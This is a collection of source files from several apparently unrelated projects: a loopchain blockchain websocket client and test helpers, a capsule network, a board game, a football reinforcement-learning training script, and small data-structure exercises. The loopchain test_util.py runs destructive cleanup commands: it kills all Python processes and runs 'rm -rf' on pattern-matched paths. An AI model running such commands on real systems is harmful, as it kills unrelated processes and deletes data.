self._target_uri = f"{scheme}://{netloc}/api/ws/{channel}"
self._exception = None
self._websocket: WebSocketClientProtocol = None
self._subscribe_event: Event = None
ws_methods.add(self.node_ws_PublishHeartbeat)
ws_methods.add(self.node_ws_PublishNewBlock)
logging.debug(f"websocket target uri : {self._target_uri}")
def __del__(self):
# TODO: Check usage
if self._websocket is not None:
utils.logger.warning(f"Have to close before delete NodeSubscriber instance({self})")
async def close(self):
if self._websocket is not None:
websocket = self._websocket
self._websocket = None
if not websocket.closed:
logging.debug(f"Closing websocket connection to {self._target_uri}...")
await websocket.close()
async def start(self, event, block_height):
self._subscribe_event = event
await self._prepare_connection()
await self._handshake(block_height)
await self._run()
async def _prepare_connection(self):
self._websocket: WebSocketClientProtocol = await websockets.connect(
uri=self._target_uri,
max_size=4 * conf.MAX_TX_SIZE_IN_BLOCK,
loop=MessageQueueService.loop
)
async def _handshake(self, block_height):
try:
await self._subscribe_request(block_height)
await self._recv_until_timeout()
if self._exception:
raise self._exception
except Exception as e:
logging.debug(f"Exception raised during handshake step: {e}", exc_info=True)
await self.close()
raise
else:
logging.debug(f"Websocket connection is completed, with id({id(self._websocket)})")
async def _subscribe_request(self, block_height):
request = Request(
method="node_ws_Subscribe",
height=block_height,
peer_id=ChannelProperty().peer_id
)
await self._websocket.send(json.dumps(request))
async def _recv_until_timeout(self):
response: bytes = await asyncio.wait_for(
fut=self._websocket.recv(),
timeout=2 * conf.TIMEOUT_FOR_WS_HEARTBEAT
)
response_dict = convert_response_to_dict(response)
await ws_methods.dispatch(response_dict)
async def _run(self):
try:
while True:
if self._exception:
raise self._exception
await self._recv_until_timeout()
except AnnounceNewBlockError as e:
logging.error(f"{type(e)} during subscribe, caused by: {e}")
raise
except UnregisteredException as e:
logging.info(f"{type(e)} during subscribe, caused by: {e}")
raise
except Exception as e:
logging.info(f"{type(e)} during subscribe, caused by: {e}")
raise ConnectionError
finally:
await self.close()
async def node_ws_PublishNewBlock(self, **kwargs):
block_dict, votes_dumped = kwargs.get('block'), kwargs.get('confirm_info', '')
try:
votes_serialized = json.loads(votes_dumped)
vote = BlockVotes.deserialize_votes(votes_serialized)
except json.JSONDecodeError:
vote = votes_dumped
blockchain = ObjectManager().channel_service.block_manager.blockchain
new_block_height = blockchain.block_versioner.get_height(block_dict)
if new_block_height > blockchain.block_height:
block_version = blockchain.block_versioner.get_version(new_block_height)
block_serializer = BlockSerializer.new(block_version, blockchain.tx_versioner)
confirmed_block = block_serializer.deserialize(block_dict)
block_verifier = BlockVerifier.new(block_version, blockchain.tx_versioner)
block_verifier.invoke_func = blockchain.score_invoke
reps_getter = blockchain.find_preps_addresses_by_roothash
try:
block_verifier.verify(confirmed_block,
blockchain.last_block,
blockchain,
generator=blockchain.get_expected_generator(confirmed_block),
reps_getter=reps_getter)
except Exception as e:
self._exception = AnnounceNewBlockError(f"error: {type(e)}, message: {str(e)}")
else:
logging.debug(f"add_confirmed_block height({confirmed_block.header.height}), "
f"hash({confirmed_block.header.hash.hex()}), votes_dumped({votes_dumped})")
ObjectManager().channel_service.block_manager.add_confirmed_block(confirmed_block=confirmed_block,
confirm_info=vote)
finally:
ObjectManager().channel_service.reset_block_monitoring_timer()
async def node_ws_PublishHeartbeat(self, **kwargs):
def _callback(exception):
self._exception = exception
if not self._subscribe_event.is_set():
# set subscribe_event to transit the state to Watch.
self._subscribe_event.set()
timer_key = TimerService.TIMER_KEY_WS_HEARTBEAT
timer_service = ObjectManager().channel_service.timer_service
if timer_key in timer_service.timer_list:
timer_service.reset_timer(timer_key)
else:
timer = Timer(
target=timer_key,
duration=3 * conf.TIMEOUT_FOR_WS_HEARTBEAT,
callback=_callback,
callback_kwargs={'exception': ConnectionError("No Heartbeat.")}
)
timer_service.add_timer(timer_key, timer)
```
#### File: testcase/unittest/test_util.py
```python
import asyncio
import json
import logging
import os
import random
import time
from sys import platform
import loopchain
import loopchain.utils as util
from loopchain import configure as conf
from loopchain.baseservice import StubManager, CommonSubprocess
from loopchain.blockchain.blocks import Block
from loopchain.blockchain.transactions import Transaction, TransactionBuilder, TransactionVersioner
from loopchain.blockchain.types import Address
from loopchain.components import SingletonMetaClass
from loopchain.peer import Signer
from loopchain.protos import loopchain_pb2, loopchain_pb2_grpc
from loopchain.store.key_value_store import KeyValueStoreError, KeyValueStore
from loopchain.utils import loggers
from loopchain.utils.message_queue import StubCollection
loggers.set_preset_type(loggers.PresetType.develop)
loggers.update_preset()
def run_peer_server_as_process(port, radiostation_port=conf.PORT_RADIOSTATION, group_id=None, score=None):
args = ['python3', 'loopchain.py', 'peer', '-d', '-p', str(port),
'-r', f"{util.get_private_ip()}:{radiostation_port}"]
logging.debug(f"run_peer_server_as_process ({args})")
return CommonSubprocess(args)
def run_peer_server_as_process_and_stub(
port, radiostation_port=conf.PORT_RADIOSTATION, group_id=None, score=None, timeout=None, wait=True):
if timeout is None:
timeout = conf.TIMEOUT_FOR_PEER_INIT
process = run_peer_server_as_process(port, radiostation_port, group_id, score)
async def _wait():
StubCollection().amqp_target = conf.AMQP_TARGET
StubCollection().amqp_key = f"{util.get_private_ip()}:{port}"
logging.debug(f'{StubCollection().amqp_key} peer hello')
await StubCollection().create_peer_stub()
await StubCollection().peer_stub.async_task().hello()
logging.debug(f'{StubCollection().amqp_key} peer hello complete')
if wait:
loop = asyncio.new_event_loop()
asyncio.set_event_loop(loop)
try:
future = asyncio.ensure_future(_wait())
loop.run_until_complete(future)
loop.stop()
loop.close()
except Exception as e:
logging.warning(f"Exception in loop : {e}")
stub, channel = util.get_stub_to_server(f"localhost:{port}", stub_class=loopchain_pb2_grpc.PeerServiceStub)
return process, stub
def run_peer_server_as_process_and_stub_manager(
port, radiostation_port=conf.PORT_RADIOSTATION, group_id=None, score=None, timeout=None):
process = run_peer_server_as_process(port, radiostation_port, group_id, score)
stub_manager = StubManager(f"localhost:{port}", loopchain_pb2_grpc.PeerServiceStub, ssl_auth_type=conf.GRPC_SSL_TYPE)
return process, stub_manager
def run_radio_station_as_process(port):
args = ['python3', 'loopchain.py', 'rs', '-d', '-p', str(port)]
logging.debug(f"run_radio_station_as_process ({args})")
return CommonSubprocess(args)
def run_radio_station_as_process_and_stub_manager(port, timeout=None):
process = run_radio_station_as_process(port)
stub_manager = StubManager(f"localhost:{port}",
loopchain_pb2_grpc.RadioStationStub,
conf.GRPC_SSL_TYPE)
util.request_server_in_time(stub_manager.stub.GetStatus, loopchain_pb2.StatusRequest(request=""))
return process, stub_manager
def run_radio_station_as_process_and_stub(port):
process = run_radio_station_as_process(port)
stub, channel = util.get_stub_to_server(
target=f"localhost:{port}",
stub_class=loopchain_pb2_grpc.RadioStationStub
)
return process, stub
def run_score_server_as_process(amqp_key):
args = ['python3', 'loopchain.py', 'score',
'--channel', conf.LOOPCHAIN_DEFAULT_CHANNEL,
'--amqp_key', amqp_key,
'--score_package', "score_package",
'-d']
logging.debug(f"run_score_server_as_process ({args})")
return CommonSubprocess(args)
async def run_score_server_as_process_and_stub_async():
amqp_key = str(time.time())
process = run_score_server_as_process(amqp_key)
StubCollection().amqp_target = conf.AMQP_TARGET
StubCollection().amqp_key = amqp_key
logging.debug(f'{StubCollection().amqp_key} score hello')
await StubCollection().create_score_stub(conf.LOOPCHAIN_DEFAULT_CHANNEL, 'score_package')
await StubCollection().score_stubs[conf.LOOPCHAIN_DEFAULT_CHANNEL].async_task().hello()
logging.debug(f'{StubCollection().amqp_key} score hello complete')
return process, StubCollection().score_stubs[conf.LOOPCHAIN_DEFAULT_CHANNEL]
def print_testname(testname):
print("\n======================================================================")
print("Test %s Start" % testname)
print("======================================================================")
def make_key_value_store(store_identity="") -> KeyValueStore:
store_default_path = './' + (store_identity, "db_test")[store_identity == ""]
store_path = store_default_path
store = None
retry_count = 0
while store is None and retry_count < conf.MAX_RETRY_CREATE_DB:
try:
uri = f"file://{store_path}"
store = KeyValueStore.new(uri, create_if_missing=True)
logging.debug(f"make key value store uri: {uri}")
except KeyValueStoreError:
store_path = store_default_path + str(retry_count)
retry_count += 1
return store
def close_open_python_process():
# ubuntu patch
if platform == "darwin":
os.system("pkill -f python")
os.system("pkill -f Python")
else:
os.system("pgrep -f python | tail -$((`pgrep -f python | wc -l` - 1)) | xargs kill -9")
def clean_up_temp_db_files(kill_process=True):
from pathlib import Path
loopchain_root = Path(os.path.dirname(loopchain.__file__)).parent
if kill_process:
close_open_python_process()
print(f"loopchain root : {loopchain_root}")
os.system(f'rm -rf $(find {loopchain_root} -name db_*)')
os.system(f'rm -rf $(find {loopchain_root} -name *test_db*)')
os.system(f'rm -rf $(find {loopchain_root} -name *_block)')
os.system(f"rm -rf {loopchain_root}/testcase/db_*")
os.system(f"rm -rf {loopchain_root}/.storage")
time.sleep(1)
def clean_up_mq():
os.system("rabbitmqctl stop_app")
os.system("rabbitmqctl reset")
os.system("rabbitmqctl start_app")
def create_basic_tx(peer_auth: Signer) -> Transaction:
"""
:param peer_auth:
:return: transaction
"""
tx_builder = TransactionBuilder.new("0x3", TransactionVersioner())
tx_builder.private_key = peer_auth._private_key
tx_builder.to_address = Address("hx3f376559204079671b6a8df481c976e7d51b3c7c")
tx_builder.value = 1
tx_builder.step_limit = 100000000
tx_builder.nid = 3
return tx_builder.build()
def add_genesis_block():
tx_info = None
channel = conf.LOOPCHAIN_DEFAULT_CHANNEL
if "genesis_data_path" in conf.CHANNEL_OPTION[channel]:
genesis_data_path = conf.CHANNEL_OPTION[channel]['initial_genesis_block_data_file_path']
util.logger.spam(f"Try load a file of initial genesis block from ({genesis_data_path})")
try:
with open(genesis_data_path) as json_file:
tx_info = json.load(json_file)["transaction_data"]
util.logger.spam(f"generate_genesis_block::tx_info >>>> {tx_info}")
except FileNotFoundError as e:
exit(f"cannot open json file in ({genesis_data_path}): "
f"{e}")
block = Block(channel_name=channel)
block.block_status = BlockStatus.confirmed
genesis_validator = get_genesis_tx_validator(channel)
is_valid, tx = genesis_validator.init_genesis_tx(tx_info)
if is_valid:
block.put_genesis_transaction(tx)
block.generate_block()
# 제네시스 블럭을 추가 합니다.
return block
class TestServerManager(metaclass=SingletonMetaClass):
"""
"""
def __init__(self):
self.__test_port_diff = random.randrange(1, 30) * -50
self.__radiostation_port = conf.PORT_RADIOSTATION + self.__test_port_diff
# rs and peer info is tuple (process, stub_manager, port)
self.__rs_info = ()
self.__peer_info = {} # {num:peer_info}
self.__score = None
def start_servers(self, peer_count, score=None):
"""Start BlockChain network rs and peer
:param peer_count: num of peers but 0 means start only RS.
:return:
"""
logging.debug("TestServerManager start servers")
self.__score = score
# run radio station
process, stub_manager = run_radio_station_as_process_and_stub_manager(self.__radiostation_port)
self.__rs_info = (process, stub_manager, self.__radiostation_port)
time.sleep(2)
for i in range(peer_count):
peer_port = conf.PORT_PEER + (i * 7) + self.__test_port_diff
process, stub_manager = run_peer_server_as_process_and_stub_manager(
peer_port, self.__radiostation_port, score=score)
self.__peer_info[i] = (process, stub_manager, peer_port)
time.sleep(2)
def stop_all_server(self):
for i in self.__peer_info:
self.__peer_info[i][1].call_in_times(
"Stop",
loopchain_pb2.StopRequest(reason="TestServerManager"), conf.GRPC_TIMEOUT)
self.__rs_info[1].call_in_times(
"Stop",
loopchain_pb2.StopRequest(reason="TestServerManager"), conf.GRPC_TIMEOUT)
time.sleep(2)
for i in self.__peer_info:
self.__peer_info[i][0].join()
self.__rs_info[0].join()
def stop_peer(self, num):
self.__peer_info[num][1].call_in_times(
"Stop",
loopchain_pb2.StopRequest(reason="TestServerManager"), conf.GRPC_TIMEOUT)
time.sleep(2)
self.__peer_info[num][0].join()
def start_peer(self, num):
peer_port = conf.PORT_PEER + (num * 7) + self.__test_port_diff
process, stub_manager = run_peer_server_as_process_and_stub_manager(
peer_port, self.__radiostation_port, score=self.__score)
self.__peer_info[num] = (process, stub_manager, peer_port)
time.sleep(1)
def add_peer(self):
num = 0
return num
def get_stub_rs(self):
return self.__rs_info[1].stub
def get_stub_peer(self, num=0):
return self.__peer_info[num][1].stub
def get_port_rs(self):
return self.__radiostation_port
def get_port_peer(self, num):
return self.__peer_info[num][2]
def status(self):
"""
:return: json object for ServerManager status
"""
pass
``` |
{
"source": "jinwooklim/My-DML-SfM-Caps-Odometry-TF",
"score": 3
} |
#### File: My-DML-SfM-Caps-Odometry-TF/backup/capsnet.py
```python
import tensorflow as tf
from config import cfg
from euler_to_rotation import yaw_to_rotation
epsilon = 1e-9
#
# Capsule layers
#
class CapsNet():
def __init__(self):
pass
def squash(self, v):
"""Return squashed v."""
square_norm = tf.reduce_sum(tf.square(v), -2, keep_dims=True)
return square_norm / (1 + square_norm) * v / tf.sqrt(square_norm + epsilon)
def conv_caps(self, input, num_outputs, kernel_size, stride, vec_len):
"""Return PrimaryCaps layer, convolutional capsule layer."""
caps = tf.contrib.layers.conv2d(input, num_outputs * vec_len,
kernel_size, stride, padding="VALID",
activation_fn=tf.nn.relu)
caps = tf.reshape(caps, [cfg.batch_size, -1, vec_len, 1])
caps = self.squash(caps)
return caps
def fc_caps(self, input, num_outputs, vec_len):
"""Return DigitCaps layer, fully connected layer."""
with tf.variable_scope('routing'):
# NOTE: Choose one to use
uh = self.conv_to_fc_0(input) # Original, correct
caps = self.routing(uh, num_outputs)
caps = tf.squeeze(caps, axis=1)
return caps
# Original, correct implementation
# from <http://github.com/naturomics/CapsNet-Tensorflow>.
def conv_to_fc_0(self, u):
"""Return FC-wise contribution from conv capsules to digit capsules."""
# Shape u for tf.matmul(W, u)
# reshape: [bs, 1152, 8, 1] => [bs, 192, 1, 8, 1]
# ^^^^ ^^^^^^^
# tile: [bs, 1152, 1, 8, 1] => [bs, 192, 10, 8, 1]
# ^ ^^
u = tf.reshape(u, [cfg.batch_size, -1, 1, 8, 1])
u = tf.tile(u, [1, 1, cfg.num_of_class, 1, 1])
#assert u.get_shape() == [cfg.batch_size, 1152, 10, 8, 1]
# W: [bs, 1152, 10, 8, 1], tf.tile bach_size times
W = tf.get_variable('Weight', shape=[1, 1152, cfg.num_of_class, 8, 1], dtype=tf.float32,
initializer=tf.random_normal_initializer(stddev=cfg.stddev))
W = tf.tile(W, [cfg.batch_size, 1, 1, 1, 1])
#assert W.get_shape() == [cfg.batch_size, 1152, 10, 8, 1]
# Eq.2, uh
# [bs, 1152, 10, 8, 1].T x [bs, 192, 10, 8, 1] => [bs, 192, 10, 16, 1]
uh = tf.matmul(W, u, transpose_a=True)
#assert uh.get_shape() == [cfg.batch_size, 1152, 10, 1, 1]
return uh
def routing(self, uh, num_outputs):
"""Route by dynamic agreement."""
# In forward (inner iterations), uh_stopped = uh.
# In backward, no gradient passed back from uh_stopped to uh.
uh_stopped = tf.stop_gradient(uh, name='stop_gradient')
b = tf.zeros([cfg.batch_size, uh.shape[1].value, num_outputs, 1, 1]) # b: [bs, 1152, 10, 1, 1]
for r_iter in range(cfg.iter_routing):
with tf.variable_scope('iter_' + str(r_iter)):
c = tf.nn.softmax(b, dim=2) # [bs, 1152, 10, 1, 1]
# At last iteration, use `uh` in order to receive gradients from the following graph
if r_iter == cfg.iter_routing - 1:
# weighting uh with c, element-wise in the last two dims
s = tf.reduce_sum(tf.multiply(c, uh), axis=1, keep_dims=True)
v = self.squash(s)
#assert v.get_shape() == [cfg.batch_size, 1, 10, 1, 1]
elif r_iter < cfg.iter_routing - 1:
# Inner iterations, do not apply backpropagation
s = tf.reduce_sum(tf.multiply(c, uh_stopped), axis=1, keep_dims=True)
v = self.squash(s)
# tile from [batch_size ,1, 10, 1, 1] to [batch_size, 1152, 10, 16, 1]
# for matmul, in the last two dim: [1, 1].T x [16, 1] => [1, 1]
v_tiled = tf.tile(v, [1, 1152, 1, 1, 1])
uh_produce_v = tf.matmul(uh_stopped, v_tiled, transpose_a=True) # Agreement
#assert uh_produce_v.get_shape() == [cfg.batch_size, 1152, 10, 1, 1]
b += uh_produce_v
return(v)
#
# Network architecture
#
def model(self, conv1, num_source):
self.num_source = num_source
"""Return capsule network for MNIST."""
with tf.variable_scope('Conv1_layer'):
print("caps_conv1 : ", conv1.get_shape())
pass
#conv1 = tf.contrib.layers.conv2d(X, num_outputs=256,
# kernel_size=9, stride=1,
# padding='VALID')
#assert conv1.get_shape() == [cfg.batch_size, 20, 20, 256]
with tf.variable_scope('PrimaryCaps'):
#caps1 = self.conv_caps(conv1, num_outputs=32, kernel_size=9, stride=2, vec_len=8)
caps1 = self.conv_caps(conv1, num_outputs=32, kernel_size=4, stride=2, vec_len=8)
#caps1 = self.conv_caps(conv1, num_outputs=32, kernel_size=2, stride=1, vec_len=8)
with tf.variable_scope('DigitCaps'):
caps2 = self.fc_caps(caps1, num_outputs=cfg.num_of_class, vec_len=1)
return caps2
def predict(self, caps2):
"""Return prediction with argmax."""
with tf.variable_scope('Prediction'):
# softmax(|v|), where v: [bs, 10, 1, 1]
v_length = tf.sqrt(tf.reduce_sum(tf.square(caps2), axis=2, keep_dims=True) + epsilon)
assert v_length.get_shape() == [cfg.batch_size, cfg.num_of_class, 1, 1]
softmax_v = tf.nn.softmax(v_length, dim=1)
# index of max softmax val among the 10 digit
prediction = tf.to_int32(tf.argmax(softmax_v, axis=1))
assert prediction.get_shape() == [cfg.batch_size, 1, 1]
prediction = tf.reshape(prediction, shape=(cfg.batch_size, ))
return v_length, prediction
def decoder(self, caps2, prediction):
"""Return decoder for reconstruction of image."""
# Masking
with tf.variable_scope('Masking'):
# batch size of predictions (labels)
candid = []
for index in range(cfg.batch_size):
v = caps2[index][prediction[index], :] # [1, 1]
candid.append(tf.reshape(v, shape=(1, 1, 1, 1)))
candid = tf.concat(candid, axis=0)
assert candid.get_shape() == [cfg.batch_size, 1, 1, 1]
# Reconstruct batch size of images with 3 FC layers
with tf.variable_scope('Decoder'):
v = tf.reshape(candid, shape=(cfg.batch_size, -1)) # [bs, 1, 1, 1] => [bs, 16]
fc1 = tf.contrib.layers.fully_connected(v, num_outputs=512)
fc2 = tf.contrib.layers.fully_connected(fc1, num_outputs=1024)
assert fc2.get_shape() == [cfg.batch_size, 1024]
#self.decoded = tf.contrib.layers.fully_connected(fc2, num_outputs=(self.num_source * 6 * cfg.batch_size), activation_fn=tf.sigmoid)
self.decoded = tf.contrib.layers.fully_connected(fc2, num_outputs=(self.num_source * 6), activation_fn=tf.sigmoid)
return self.decoded
def loss(self, X, Y, v_length, decoded):
"""Return loss."""
# These work by virtue of broadcasting (0, m_plus, m_minus),
# max_l = max(0, m_plus-||v_k||)^2
# max_r = max(0, ||v_k||-m_minus)^2
# v_length: [bs, 10, 1, 1]
max_l = tf.square(tf.maximum(0., cfg.m_plus - v_length))
assert max_l.get_shape() == [cfg.batch_size, cfg.num_of_class, 1, 1]
max_r = tf.square(tf.maximum(0., v_length - cfg.m_minus))
assert max_r.get_shape() == [cfg.batch_size, cfg.num_of_class, 1, 1]
# reshape: [bs, 10, 1, 1] => [bs, 10]
max_l = tf.reshape(max_l, shape=(cfg.batch_size, -1))
max_r = tf.reshape(max_r, shape=(cfg.batch_size, -1))
# 1. Margin loss (T == Y)
L = Y * max_l + cfg.lambda_val * (1 - Y) * max_r
margin_loss = tf.reduce_mean(tf.reduce_sum(L, axis=1))
'''
# 2. Reconstruction loss
origin = tf.reshape(X, shape=(cfg.batch_size, -1)) # 4x4
rx, ry, rz = yaw_to_rotation(origin[:,0])
rx_ry_rz = tf.transpose(tf.stack([rx, ry, rz])) # 4x3
origin = tf.concat([rx_ry_rz, origin[:,1:]], 1) # 4x6
temp = origin
#print("decoded : ", decoded.get_shape())
#print("before_origin : ", origin.get_shape())
for i in range((cfg.batch_size*self.num_source)-1):
origin = tf.concat([origin, temp], 1)
#print("after_origin : ", origin.get_shape())
squared = tf.square(decoded - origin) # 4x(6*num_source) - 4x(6*num_source)
#origin = tf.concat([origin, origin], 1) # 4x8
#squared = tf.square(decoded - origin) # 4x8 - 4x8
reconstruction_loss = tf.reduce_mean(squared)
'''
origin = tf.reshape(X, shape=(cfg.batch_size, -1)) # (batch_size, 6)
decoded = tf.reshape(decoded, shape=(cfg.batch_size, self.num_source, -1))
print("#1 decoded : ", decoded.get_shape())
rz = tf.reshape(decoded[:,:,-1], shape=(cfg.batch_size, self.num_source, 1))
print("#2 rz : ", rz.get_shape())
decoded = tf.concat([decoded[:,:,:3], rz], 2)
decoded = tf.reduce_mean(decoded, 1)
squared = tf.square(decoded - origin) # (4,4) - (4, 4)
reconstruction_loss = tf.reduce_mean(squared)
# 3. Total loss
# The paper uses sum of squared error as reconstruction error, but we have
# used reduce_mean to calculate MSE. In order to keep in line with the
# paper, the regularization scale should be 0.0005*784=0.392
self.capsnet_total_loss = margin_loss + cfg.regularization_scale * reconstruction_loss
return margin_loss, reconstruction_loss, self.capsnet_total_loss
def train_op(self, total_loss, global_step):
"""Return train operation."""
optimizer = tf.train.AdamOptimizer()
return optimizer.minimize(total_loss, global_step=global_step)
def summary(self, decoded, margin_loss, reconstruction_loss, capsnet_total_loss):
"""Return train summary."""
train_summary = []
train_summary.append(tf.summary.scalar('train/margin_loss', margin_loss))
train_summary.append(tf.summary.scalar('train/reconstruction_loss', reconstruction_loss))
train_summary.append(tf.summary.scalar('train/capsnet_total_loss', capsnet_total_loss))
#recon_img = tf.reshape(decoded, shape=(cfg.batch_size, 28, 28, 1))
#train_summary.append(tf.summary.image('reconstruction_img', recon_img))
self.train_summary = tf.summary.merge(train_summary)
return self.train_summary
def accuracy(self, labels, prediction):
"""Return accuracy."""
correct_prediction = tf.equal(tf.to_int32(labels), prediction)
return tf.reduce_sum(tf.cast(correct_prediction, tf.float32))
``` |
{
"source": "JinwooPark00/TreeGame_dev",
"score": 3
} |
#### File: JinwooPark00/TreeGame_dev/board.py
```python
import random
from Tiles import WaterTile, LightTile, EventTile
class Board:
def __init__(self, players): #players would be {'number': player object}
self.players = players
self.rounds_played = 0
self.upper_bound = 5
self.lower_bound = [1]
self.season = ['Spring', 'Summer', 'Fall', 'Winter']
self.season_num = 0
self.board = []
for i in range(48):
x = random.randint(0, 100)
if x < 45:
self.board.append(WaterTile())
elif 45 <= x < 90:
self.board.append(LightTile())
else:
self.board.append(EventTile())
# for i in range(1, len(self.board)):
# if self.board[i] == self.board[i - 1] and self.board[i].isinstance(WaterTile()):
# self.board[i] = LightTile()
# elif self.board[i] == self.board[i - 1] and self.board[i].isinstance(LightTile()):
# self.board[i] = WaterTile()
def get_tile(self, i):
return self.board[i]
def change_season(self, season):
for i in self.board:
i.season = season
def probability(self):
if self.players[list(self.players.keys())[len(self.players) - 1]].turn_count == self.players[list(self.players.keys())[0]].turn_count:
self.rounds_played += 1
if self.rounds_played > 6:
if random.randint(1,5) in self.lower_bound:
if self.season_num + 1 > 3:
self.end_game()
else:
self.season_num += 1
self.change_season(self.season[self.season_num])
self.lower_bound = [1]
self.rounds_played = 0
else:
self.lower_bound.append(self.lower_bound[len(self.lower_bound) - 1] + 1)
def end_game(self):
pass
```
#### File: TreeGame_dev/Tiles/tile.py
```python
class Tile:
multipliers = {'Spring': 2, 'Summer': -1, 'Fall': 1, 'Winter': 0}
def __init__(self):
self.height = 10
self.width = 10
self.color = 'White'
self.season = ''
def event(self, player):
pass
``` |
{
"source": "jinwoop/on-policy",
"score": 2
} |
#### File: scripts/train/train_football.py
```python
import os
from pathlib import Path
import sys
import socket
# third-party packages
import numpy as np
import setproctitle
import torch
import wandb
# code repository sub-packages
from onpolicy.config import get_config
from onpolicy.envs.football.Football_Env import FootballEnv
from onpolicy.envs.env_wrappers import SubprocVecEnv, DummyVecEnv
def make_train_env(all_args):
def get_env_fn(rank):
def init_env():
if all_args.env_name == "Football":
env = FootballEnv(all_args)
else:
print("Can not support the " +
all_args.env_name + " environment.")
raise NotImplementedError
env.seed(all_args.seed + rank * 1000)
return env
return init_env
if all_args.n_rollout_threads == 1:
return DummyVecEnv([get_env_fn(0)])
else:
return SubprocVecEnv([get_env_fn(i) for i in range(
all_args.n_rollout_threads)])
def make_eval_env(all_args):
def get_env_fn(rank):
def init_env():
if all_args.env_name == "Football":
env = FootballEnv(all_args)
else:
print("Can not support the " +
all_args.env_name + " environment.")
raise NotImplementedError
env.seed(all_args.seed * 50000 + rank * 10000)
return env
return init_env
if all_args.n_eval_rollout_threads == 1:
return DummyVecEnv([get_env_fn(0)])
else:
return SubprocVecEnv([get_env_fn(i) for i in range(
all_args.n_eval_rollout_threads)])
def parse_args(args, parser):
parser.add_argument("--scenario_name", type=str,
default="academy_3_vs_1_with_keeper",
help="which scenario to run on.")
parser.add_argument("--num_agents", type=int, default=3,
help="number of controlled players.")
parser.add_argument("--representation", type=str, default="simple115v2",
choices=["simple115v2", "extracted", "pixels_gray",
"pixels"],
help="representation used to build the observation.")
parser.add_argument("--rewards", type=str, default="scoring",
help="comma separated list of rewards to be added.")
parser.add_argument("--smm_width", type=int, default=96,
help="width of super minimap.")
parser.add_argument("--smm_height", type=int, default=72,
help="height of super minimap.")
parser.add_argument("--remove_redundancy", action="store_true",
default=False,
help="by default False. If True, remove redundancy features")
parser.add_argument("--zero_feature", action="store_true",
default=False,
help="by default False. If True, replace -1 by 0")
parser.add_argument("--eval_deterministic", action="store_false",
default=True,
help="by default True. If False, sample action according to probability")
parser.add_argument("--share_reward", action='store_false',
default=True,
help="by default true. If false, use different reward for each agent.")
parser.add_argument("--save_videos", action="store_true", default=False,
help="by default, do not save render video. If set, save video.")
parser.add_argument("--video_dir", type=str, default="",
help="directory to save videos.")
all_args = parser.parse_known_args(args)[0]
return all_args
def main(args):
parser = get_config()
all_args = parse_args(args, parser)
if all_args.algorithm_name == "rmappo" or all_args.algorithm_name == "rmappg":
assert (all_args.use_recurrent_policy or all_args.use_naive_recurrent_policy), ("check recurrent policy!")
elif all_args.algorithm_name == "mappo" or all_args.algorithm_name == "mappg":
assert (all_args.use_recurrent_policy == False and all_args.use_naive_recurrent_policy == False), ("check recurrent policy!")
else:
raise NotImplementedError
# cuda
if all_args.cuda and torch.cuda.is_available():
print("choose to use gpu...")
device = torch.device("cuda:0")
torch.set_num_threads(all_args.n_training_threads)
if all_args.cuda_deterministic:
torch.backends.cudnn.benchmark = False
torch.backends.cudnn.deterministic = True
else:
print("choose to use cpu...")
device = torch.device("cpu")
torch.set_num_threads(all_args.n_training_threads)
# run dir
run_dir = Path(os.path.split(os.path.dirname(os.path.abspath(__file__)))[
0] + "/results") / all_args.env_name / all_args.scenario_name / all_args.algorithm_name / all_args.experiment_name
if not run_dir.exists():
os.makedirs(str(run_dir))
# wandb
if all_args.use_wandb:
run = wandb.init(config=all_args,
project=all_args.env_name,
entity=all_args.wandb_name,
notes=socket.gethostname(),
name="-".join([
all_args.algorithm_name,
all_args.experiment_name,
"rollout" + str(all_args.n_rollout_threads),
"minibatch" + str(all_args.num_mini_batch),
"epoch" + str(all_args.ppo_epoch),
"seed" + str(all_args.seed)
]),
group=all_args.scenario_name,
dir=str(run_dir),
job_type="training",
reinit=True)
else:
if not run_dir.exists():
curr_run = 'run1'
else:
exst_run_nums = [int(str(folder.name).split('run')[1]) for folder in run_dir.iterdir() if str(folder.name).startswith('run')]
if len(exst_run_nums) == 0:
curr_run = 'run1'
else:
curr_run = 'run%i' % (max(exst_run_nums) + 1)
run_dir = run_dir / curr_run
if not run_dir.exists():
os.makedirs(str(run_dir))
setproctitle.setproctitle("-".join([
all_args.env_name,
all_args.scenario_name,
all_args.algorithm_name,
all_args.experiment_name
]) + "@" + all_args.user_name)
# seed
torch.manual_seed(all_args.seed)
torch.cuda.manual_seed_all(all_args.seed)
np.random.seed(all_args.seed)
# env init
envs = make_train_env(all_args)
eval_envs = make_eval_env(all_args) if all_args.use_eval else None
num_agents = all_args.num_agents
config = {
"all_args": all_args,
"envs": envs,
"eval_envs": eval_envs,
"num_agents": num_agents,
"device": device,
"run_dir": run_dir
}
# run experiments
if all_args.share_policy:
from onpolicy.runner.shared.football_runner import FootballRunner as Runner
else:
from onpolicy.runner.separated.football_runner import FootballRunner as Runner
runner = Runner(config)
runner.run()
# post process
envs.close()
if all_args.use_eval and eval_envs is not envs:
eval_envs.close()
if all_args.use_wandb:
run.finish()
else:
runner.writter.export_scalars_to_json(str(runner.log_dir + '/summary.json'))
runner.writter.close()
if __name__ == "__main__":
main(sys.argv[1:])
``` |
{
"source": "jinwoov/dsa-practice",
"score": 4
} |
#### File: py/binaryTree/binarySearchTree.py
```python
from node import Node
from binaryTree import BinaryTree
class BinarySearchTree:
def __init__(self):
self.root = None
def insert(self, roots: Node, val):
if(self.root is None):
node = Node(val)
self.root = node
else:
if(roots is None):
node = Node(val)
roots = node
return roots
else:
if(roots.value >= val):
roots.left = self.insert(roots.left, val)
else:
roots.right = self.insert(roots.right, val)
return roots
def contains(self, roots, searchVal):
if(roots is None):
return False
else:
if(roots.value == searchVal):
return True
elif(roots.value >= searchVal):
return self.contains(roots.left, searchVal)
else:
return self.contains(roots.right, searchVal)
bst = BinarySearchTree()
bst.insert(bst.root, 5)
bst.insert(bst.root, 3)
bst.insert(bst.root, 4)
bst.insert(bst.root, 7)
bst.insert(bst.root, 8)
result = bst.contains(bst.root, 7)
print(result)
# bt = BinaryTree()
# #bt.preOrder(bst.root)
# #bt.inOrder(bst.root)
# # bt.postOrder(bst.root)
# bt.breadthFirst(bst.root)
```
#### File: py/linkedlist/nodeLL.py
```python
class Node:
def __init__(self,val):
self.value = val
self.next = None
``` |
{
"source": "jinwoov/OPS301",
"score": 4
} |
#### File: OPS301/ops-challenge/ops-challenge09.py
```python
pokemon = ["Pikachu", "Charmander ", "Bulbasaur", "Onyx", "Eevee", "Gangar", "Grimer", "Rattat", "Pidgey", "Mew"]
cities = []
# Declaration of functions
def getElement(num, numTwo):
print(pokemon[num:numTwo])
def changeElement(num, string):
pokemon[num] = string
def askUser():
